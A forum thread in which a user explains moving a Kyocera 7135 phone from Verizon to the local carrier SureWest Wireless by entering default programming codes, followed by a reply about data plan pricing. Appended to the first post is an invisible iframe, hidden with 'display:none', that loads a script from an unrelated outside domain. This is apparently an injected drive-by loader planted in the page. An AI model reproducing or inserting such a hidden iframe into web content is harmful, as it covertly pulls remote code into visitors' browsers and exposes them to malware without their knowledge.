+ Reply to Thread

7135** Verizon Vs. Local CDMA Carrier

My situation was simple. I live and work in my local area. I do not need to have the global coverage Verizon offers for their high prices. I wanted to use my 7135 with my local carrier, SureWest Wireless. If you are in my situation this IS possible.

Just have them add your ESN number of your phone to your account. On your phone (in phone mode) punch in the following code as if going to dial a number "111111".

Scroll down with your toggle to the "Options" option, Select OK.

Go to Programming. Punch in "000000"

Have the local provider go through with you and setup their cooresponding information and waala!

Give this a few minutes and you should be good. To run a test to verify. First call verizon have them suspend your account. Threaten to quit if they threaten to charge you a $15 dollar reconnect fee if all does not work. Hopefully you will not even need to go there.

Good luck I am a happy customer with Sure West now with my 7135 from Verizon. I am now unlimited minutes for $29 a month!!!

HAVE a Good day.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Live long and prosper...

Giddyup, Giddyup, Giddyup 7135 TheBeachBoy's Avatar

One question

What about data usage? I'm assuming that data would not be supported. Of course, if you don't need it, then this setup is great. Let me know if data can be supported. Thanks!
    TheBeachBoy

--The World's Greatest Drummer--
    Drummer for the Fondells

Re: One question

Originally posted by TheBeachBoy
    What about data usage? I'm assuming that data would not be supported. Of course, if you don't need it, then this setup is great. Let me know if data can be supported. Thanks!

Check out SureWest Wireless web site for their full plan details.

Cool, for example, data service added to the 28.95 calling plan for only $4.95 a month. Or as low a $2.95 added for just e-mail.

Metro PCS in Miami, San Francisco-Scramento areas started a similar concept, and they have CDMA 1X EV-DO in Miami. That is to offer the smallest unlimited calling plan possible to allow your wireless within their service area to be like the old landline phone service people are use to --- one monthly bill and use anytime. Then they offer other services bundled in small packets to fit the user preferences.

Wireless challange to landline is happening thanks to the new high speed data service that compares to DSL!